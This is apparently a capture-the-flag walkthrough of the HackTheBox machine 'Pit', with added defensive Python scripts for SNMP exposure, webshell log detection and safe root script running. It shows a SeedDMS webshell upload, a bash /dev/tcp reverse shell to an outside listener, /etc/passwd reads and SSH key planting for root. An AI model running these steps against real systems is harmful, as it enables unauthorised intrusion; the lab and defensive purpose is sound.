Pit

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.241 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
nmap -sC -sV -p22,80,9090 10.10.10.241 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
As seen in the nmap report, there is a domain called dms-pit.htb. Let's add it to the /etc/hosts file.
nano /etc/hosts
The website on port 80 shows the default nginx page.

There is a CentOS Linux login page on port 9090, but we don't have credentials.

The dms-pit.htb domain serves a different website, which returns a 403 status code; this means the server uses name-based virtual hosting.

One thing we have missed so far is UDP ports. The SNMP service is exposed on UDP port 161.
nmap -sU -p- --min-rate 10000 -n -Pn -oN allPortsUDP 10.10.10.241
-p-: scan the entire port range, from 1 to 65535.
-sU: UDP scan.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPortsUDP file.
To enumerate the SNMP service, we need to install the MIBs package and comment out the mibs line in the /etc/snmp/snmp.conf file.
apt-get install snmp-mibs-downloader
nano /etc/snmp/snmp.conf
Sometimes we can get useful information from the SNMP service. In this case, using snmpwalk we'll see the path /var/www/html/seeddms51x/seeddms, and the /usr/bin/monitor binary being executed, which reveals the user michelle.
snmpwalk -v 2c -c public 10.10.10.241 1
-v: specify the SNMP version to use.
-c: set the community string.
1: the OID to walk from; 1 covers the whole tree.
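The finding above is a common one: a read-only "public" community string hands any network neighbour the host's process table (HOST-RESOURCES-MIB hrSWRunPath and hrSWRunParameters), and whatever an administrator put on a command line, including passwords, goes with it. The script below is an added example, not part of the original writeup, that audits saved snmpwalk output for exactly that exposure: it joins the two columns by PID, flags arguments that look like credentials, and lists interpreter processes that reveal which scripts run on the box. The sample lines are constructed for illustration and are not the real output of the target; the patterns in SECRET_ARG_RE are an assumption about common conventions (--password=, mysql-style -pSECRET, VAR=secret).

```python
import re

# Constructed sample of snmpwalk output for the HOST-RESOURCES-MIB process
# table; illustrative only, not the real output of the target host.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/usr/lib/systemd/systemd"
HOST-RESOURCES-MIB::hrSWRunPath.812 = STRING: "/usr/sbin/snmpd"
HOST-RESOURCES-MIB::hrSWRunPath.2201 = STRING: "/bin/bash"
HOST-RESOURCES-MIB::hrSWRunPath.2310 = STRING: "/usr/bin/mysql"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--switched-root --system"
HOST-RESOURCES-MIB::hrSWRunParameters.812 = STRING: "-LS0-6d -f"
HOST-RESOURCES-MIB::hrSWRunParameters.2201 = STRING: "/usr/bin/monitor"
HOST-RESOURCES-MIB::hrSWRunParameters.2310 = STRING: "-u michelle -pSuperSecret1 seeddms"
"""

# One row of the walk: column name, PID index, quoted string value.
LINE_RE = re.compile(
    r'^HOST-RESOURCES-MIB::(hrSWRunPath|hrSWRunParameters)\.(\d+) = STRING: "(.*)"$'
)

# Assumed conventions under which a secret ends up in argv.
SECRET_ARG_RE = re.compile(
    r"(?:--?(?:password|passwd|pass|pw|token|secret|api[-_]?key)[=\s]\S+"  # --password=x, -pass x
    r"|(?<=\s)-p\S+"                                                        # mysql-style -pSECRET
    r"|\b\w*(?:password|passwd|token|secret)\w*=\S+)",                      # DB_PASSWORD=x
    re.IGNORECASE,
)


def parse_process_table(walk_text):
    """Join hrSWRunPath and hrSWRunParameters rows by PID into {pid: (path, args)}."""
    rows = {}
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        column, pid, value = m.group(1), int(m.group(2)), m.group(3)
        path, args = rows.get(pid, ("", ""))
        if column == "hrSWRunPath":
            path = value
        else:
            args = value
        rows[pid] = (path, args)
    return rows


def find_exposed_secrets(procs):
    """Return [(pid, path, matched_fragment)] for command lines that carry a credential."""
    hits = []
    for pid, (path, args) in sorted(procs.items()):
        for m in SECRET_ARG_RE.finditer(args):
            hits.append((pid, path, m.group(0)))
    return hits


def find_script_runners(procs, interpreters=("/bin/bash", "/bin/sh", "/usr/bin/python3")):
    """Return [(pid, script)] for interpreter processes whose first argument names a script."""
    return [(pid, args.split()[0]) for pid, (path, args) in sorted(procs.items())
            if path in interpreters and args]


if __name__ == "__main__":
    procs = parse_process_table(SAMPLE_WALK)
    for pid, path, frag in find_exposed_secrets(procs):
        print(f"pid {pid}: {path} exposes a credential on its command line ({frag})")
    for pid, script in find_script_runners(procs):
        print(f"pid {pid}: interpreter running {script}")
```

Run it against the output of snmpwalk saved to a file to see what an unauthenticated reader learns about your host; the fixes are to keep secrets out of argv (config files, environment from a credential store), to replace the default community string, and to restrict the snmpd view so the process table is not exported at all.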
Exploitation
The http://dms-pit.htb/seeddms51x/seeddms website shows a SeedDMS login page. We could try to log in with the username and password michelle.

These credentials work, and we'll see that there is a folder called Docs with a file called Upgrade Note inside.

Let's search for any common vulnerabilities of SeedDMS.
searchsploit seeddms
Let's check the one called SeedDMS versions < 5.1.11 - Remote Command Execution.
searchsploit -x php/webapps/47022.txt
Apparently, there is a way to get RCE by uploading a webshell. Let's follow the steps. First, go to the Docs folder.

Then, access the Users folder.

Go to the Michelle folder, where we should see the option to add a new document.

Create a simple PHP webshell.
nano pwn.php
Add a new document, and upload the pwn.php webshell.

Once the webshell is uploaded, if we hover over the file, we'll see that it has the documentid 29.

Now, if we access the following URL, we'll be able to run commands on the server, and list the /etc/passwd file.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd

Time to get a shell. First, set up a netcat listener on port 4444, wrapped in rlwrap so the shell gets line editing and history.
rlwrap nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
Now, send a reverse shell using the webshell we just uploaded.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"
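Every step of the exploitation above leaves a trace in the web server's access log: a PHP file requested from under the document store, a cmd parameter, and a URL-encoded reverse shell. The script below is an added example, not part of the original writeup, that turns those traces into detection logic over nginx combined-format log lines. The log lines are constructed for illustration (addresses, timestamps and sizes are made up; the paths follow the SeedDMS layout shown above); the assumption is that the data/ tree of a SeedDMS install should only ever serve inert documents, so any executable extension or command parameter there is worth an alert.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines (combined format); illustrative only.
SAMPLE_LOG = """\
10.10.14.5 - - [12/May/2021:10:01:02 +0000] "GET /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [12/May/2021:10:01:40 +0000] "POST /seeddms51x/seeddms/op/op.AddDocument.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [12/May/2021:10:02:15 +0000] "GET /seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.10.14.5 - - [12/May/2021:10:03:01 +0000] "GET /seeddms51x/data/1048576/29/1.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.5/4444%200%3E%261%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2021:10:05:00 +0000] "GET /seeddms51x/data/1048576/30/1.pdf HTTP/1.1" 200 88210 "-" "Mozilla/5.0"
"""

# Client, timestamp, request line and status of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# SeedDMS stores uploads as data/<folder>/<documentid>/<version>.<ext>; that
# tree should hold documents only, never anything the server will execute.
DATA_PATH_RE = re.compile(r"^/seeddms51x/data/\d+/\d+/\d+\.(?P<ext>[A-Za-z0-9]+)$")
EXEC_EXTS = {"php", "phtml", "phar", "php3", "php5", "php7"}
# Fragments that mark a command parameter as a shell callback or credential read.
SHELL_HINTS = ("/dev/tcp/", "bash -i", "sh -i", "/etc/passwd", "nc -e")


def parse_line(line):
    """Split one log line into its fields; the query string is decoded by parse_qs."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
        "path": url.path, "query": parse_qs(url.query), "status": int(m.group("status")),
    }


def classify(rec):
    """Return the reasons this request looks like use of an uploaded webshell."""
    reasons = []
    m = DATA_PATH_RE.match(rec["path"])
    if not m:
        return reasons
    if m.group("ext").lower() in EXEC_EXTS:
        reasons.append("executable extension served from the document store")
    cmd = rec["query"].get("cmd", [""])[0]
    if cmd:
        reasons.append(f"cmd parameter: {cmd}")
        if any(hint in cmd for hint in SHELL_HINTS):
            reasons.append("command looks like a reverse shell or credential read")
    return reasons


def scan_log(text):
    """Return [(client_ip, path, reasons)] for every suspicious request in the log."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["ip"], rec["path"], reasons))
    return alerts


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}")
        for r in reasons:
            print(f"    - {r}")
```

The decoded cmd values show why decoding matters: the %26 that the page uses to smuggle an ampersand through the URL comes back as the >& redirection of the reverse shell. The durable fix is server-side, a location rule that refuses to execute anything below data/, with the detection kept as a backstop.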
Privilege Escalation
There is a conf directory in /var/www/html/seeddms51x/ containing a file called settings.xml.
ls -l /var/www/html/seeddms51x/conf
The settings.xml file contains credentials for a MySQL database.
cat /var/www/html/seeddms51x/conf/settings.xml
We could try to log in to the login page at https://dms-pit.htb:9090 as the user michelle with the password we just found.

The login is successful.

Note that there is a section called Terminal, which gives us a web terminal as michelle. From there we can grab the user flag.

Let's investigate what is exactly /usr/bin/monitor.
cat /usr/bin/monitor
It runs every bash script located in /usr/local/monitoring/ whose name starts with check and ends with sh. Let's see what privileges we have on that directory.
getfacl /usr/local/monitoring/
We have permission to create new files in that directory. We could create a new script named check_alfa8sa.sh that inserts our public SSH key into root's authorized_keys file. First, grab our public SSH key.
cat ~/.ssh/id_rsa.pub
Then, create the check_alfa8sa.sh inside /usr/local/monitoring/ with the following code.
vi /usr/local/monitoring/check_alfa8sa.sh
Now, to trigger the script, we need to run snmpwalk again.
snmpwalk -v 2c -c public 10.10.10.241 1
-v: specify the SNMP version to use.
-c: set the community string.
1: the OID to walk from; 1 covers the whole tree.
Now, we should be able to log in via SSH as root without any password. Then, all we have to do is reap the harvest and take the root flag.
ssh root@10.10.10.241
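The root cause of the escalation is a root-run job that executes whatever matches check*.sh in a directory a low-privilege user can write to, and, as the getfacl step shows, the write grant is an ACL entry that ls -l would never display. The code below is an added example, not the contents of the box's /usr/bin/monitor (which the page does not reproduce) and not project code; it shows how such a runner should vet each script before executing it: correct owner, no group/world write bit on the file or its directory, no symlink, and no named ACL entry granting write. The getfacl text is a constructed sample modelled on the situation described above; the runner's file names and the trusted_uid parameter are assumptions for illustration.

```python
import os
import re
import stat
import subprocess
import tempfile

# Constructed getfacl output for a directory that hands write access to a
# non-root user through a named ACL entry; illustrative only.
SAMPLE_GETFACL = """\
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::r-x
"""

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def acl_extra_writers(getfacl_text):
    """Named user/group ACL entries that effectively grant write (entry AND mask)."""
    entries, mask = [], None
    for raw in getfacl_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop headers and #effective notes
        m = re.match(r"^(user|group):([^:]*):([rwx-]{3})$", line)
        if m:
            entries.append(m.groups())
            continue
        mm = re.match(r"^mask::([rwx-]{3})$", line)
        if mm:
            mask = mm.group(1)
    writers = []
    for kind, name, perms in entries:
        if not name:                                  # user:: / group:: are owner entries
            continue
        if "w" in perms and (mask is None or "w" in mask):
            writers.append(f"{kind}:{name}")
    return writers


def safe_to_run(path, trusted_uid=0, acl_text=None):
    """Return (ok, reason): only a regular file owned by trusted_uid, writable by
    nobody else, in a directory nobody else can write to, is acceptable."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False, "symlink"
    if not stat.S_ISREG(st.st_mode):
        return False, "not a regular file"
    if st.st_uid != trusted_uid:
        return False, f"owned by uid {st.st_uid}, not {trusted_uid}"
    if st.st_mode & WRITE_BY_OTHERS:
        return False, "group/world writable"
    dst = os.stat(os.path.dirname(path) or ".")
    if dst.st_uid != trusted_uid or dst.st_mode & WRITE_BY_OTHERS:
        return False, "directory owned or writable by someone else"
    if acl_text:                                      # mode bits cannot show ACL grants
        extra = acl_extra_writers(acl_text)
        if extra:
            return False, "directory ACL grants write to " + ", ".join(extra)
    return True, "ok"


def run_checks(directory, trusted_uid=0, acl_text=None, runner=None):
    """Execute every check*.sh that passes safe_to_run; return (ran, skipped)."""
    run = runner or (lambda p: subprocess.run(["/bin/bash", p], check=False))
    ran, skipped = [], []
    for name in sorted(os.listdir(directory)):
        if not (name.startswith("check") and name.endswith(".sh")):
            continue
        path = os.path.join(directory, name)
        ok, why = safe_to_run(path, trusted_uid, acl_text)
        if ok:
            run(path)
            ran.append(name)
        else:
            skipped.append((name, why))
    return ran, skipped


def demo_in_tempdir():
    """Scratch monitoring directory owned by the current user, run with a no-op
    runner so nothing executes; returns the verdicts for inspection."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)
    good, bad = os.path.join(d, "check_disk.sh"), os.path.join(d, "check_extra.sh")
    for p in (good, bad):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(good, 0o755)
    os.chmod(bad, 0o777)                              # writable by everyone: must be refused
    ran, skipped = run_checks(d, trusted_uid=os.getuid(), runner=lambda p: None)
    return {"ran": ran, "skipped": skipped,
            "acl_verdict": safe_to_run(good, os.getuid(), SAMPLE_GETFACL)}


if __name__ == "__main__":
    print(demo_in_tempdir())
```

The same vetting belongs anywhere snmpd's extend mechanism or cron runs scripts as root; better still, keep the directory root-owned with no ACL entries at all, and treat a getfacl listing that shows a named user with w as a finding in its own right.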